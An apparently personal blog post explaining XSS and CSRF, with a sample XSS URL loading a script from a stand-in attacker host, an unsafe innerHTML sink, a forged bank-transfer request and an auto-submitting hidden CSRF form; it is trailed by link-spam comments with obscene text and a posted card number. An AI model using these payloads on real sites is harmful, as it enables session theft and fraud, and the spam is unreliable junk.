Web Security Vulnerabilities

25 February 2025

Introduction

The purpose of this post is to improve my understanding of the common web vulnerabilities. I will define and provide some contextual and code examples. Discussed vulnerabilities are cross-site scripting (XSS) and cross-site request forgery (CSRF).


XSS:

Cross-site scripting occurs when a hacker finds a vulnerability in a client application that allows them to inject a malicious script in order to steal a user's session information. This stolen session information allows the hacker to act as the victim.


Reflected XSS (Not Persistent):

If a hacker discovers that an application poorly sanitizes user input, they can inject a malicious script into the form which would appear in a URL parameter. Now they can do some social engineering tactics such as a Trojan link and send it to the masses in hopes that a poor victim will click the link and activate the script. Reflected XSS is not persistent because the script isn't saved to the application's database.

https://forumsite.com/q=<script>alert('I am a hacker')</script>%20src="http://iamhacker.com/steal-information.js"


Stored XSS (Persistent):

Similar to a reflected attack, but here the poorly sanitized input will be saved to the application's database. Now future responses from the server will send the malicious script to the client to run on their machines. This is the most effective XSS attack and a significantly greater vulnerability for the end-user.


DOM-based XSS:

This attack uses the DOM as the means of malicious intent, more specifically a "sink DOM". The hacker can propagate a malicious script via the application's Javascript code. This attack also employs the Trojan link tactic and the link will propagate the "sink DOM". This vulnerability is also due to the application developer's poor implementation of form sanitization.

// Attacker can inject malicious JavaScript in the "comment" variable
function displayUserComment(comment) {
  document.getElementById("comment-section").innerHTML = comment; 
}


CSRF (XSRF):

A hacker uses CSRF to forge authenticated requests to a target application.


For an application to be vulnerable it would have to have:

1. Authentication that SOLELY relies on session cookies.

2. NO safeguards for users, such as re-entering a passcode in order to change the passcode.


The hacker will once again have to apply social engineering tactics to get the user to click on their ill-purposed link. The hostname (domain) of the hacker's link is likely to be that of the target application's, with the necessary parameters ready to be sent. All the hacker needs is the user's logged in session cookie to authenticate the request. All of this work requires the hacker to have some knowledge of the target application's code. Hackers can also phish users by creating their own HTML page containing the malicious link.


Forged request:

POST /transfer HTTP/1.1
Host: www.bank.com
Content-Type: application/x-www-form-urlencoded
Cookie: session_id=abc123;   <-- Authenticated session cookie

to=hackerAccount&amount=1000

A hidden form with a forged request:

<form action="https://bank.com/transfer" method="POST">
  <input type="hidden" name="amount" value="100000">
  <input type="hidden" name="to_account" value="hacker_account">
  <input type="submit" value="Submit">
</form>
<script>
  document.forms[0].submit(); // Automatically submits the form when the page loads
</script>
DonrAmoks
www@don-rem.ru

Hello. . [url=https://don-rem.ru]don-rem.ru[/url] <a href=https://don-rem.ru/>https://don-rem.ru</a> https://don-rem.ru zwz4967494

edit
18 February 2025 at 17:52
Surya Polina
suryapolina@gmail.com

bots be gone

edit
9 February 2025 at 07:52
DunrewGen
rew33@donetsk365.ru

[url=https://domcoffee.site]fuck off bitch щдюхи вонючие пезды [/url] domcoffee.site <a href=https://domcoffee.site> щдюхи вонючие пезды</a> +zwz4753674 <a href=https://domcoffee.site> fucking porno video</a> +zwz4753674

edit
25 January 2025 at 08:17
DuncanGen
rew33@donetsk365.ru

[url=https://domcoffee.site]fuck off bitch щдюхи вонючие пезды [/url] domcoffee.site <a href=https://domcoffee.site> щдюхи вонючие пезды</a> +zwz4753674 <a href=https://domcoffee.site> fucking porno video</a> +zwz4753674

edit
16 January 2025 at 09:17
UtyrewHib
tre3@donrem.ru

Hello. . [url=https://nw.dn.ua/]nw.dn.ua[/url] <a href=https://nw.dn.ua/>nw.dn.ua</a> https://nw.dn.ua zwz4763574

edit
5 January 2025 at 04:17
Albertnit
sete@don-rem.ru

Hello. . [url=https://don-rem.ru]don-rem.ru[/url]

edit
1 January 2025 at 13:18
FawytHib
rew@donrem.ru

Hello. . [url=https://nw.dn.ua/]nw.dn.ua[/url] <a href=https://nw.dn.ua/>nw.dn.ua</a> https://nw.dn.ua zwz4763574

edit
28 December 2024 at 13:22
Albertnit
sete@don-rem.ru

Hello. . [url=https://don-rem.ru]don-rem.ru[/url]

edit
25 December 2024 at 11:39
FawetHib
nik@don-rem.ru

Hello. . [url=https://nw.dn.ua/]nw.dn.ua[/url] <a href=https://nw.dn.ua/>nw.dn.ua</a> https://nw.dn.ua zwz4763574

edit
21 December 2024 at 22:41
Helpmfaips
yourmail1@gmail.com

Good afternoon, I need any financial help, if possible, help, I am grateful for earlier, 4149 5001 4353 5667 I am from Selidovo Ukraine have a nice day, success and good luck

edit
16 December 2024 at 17:33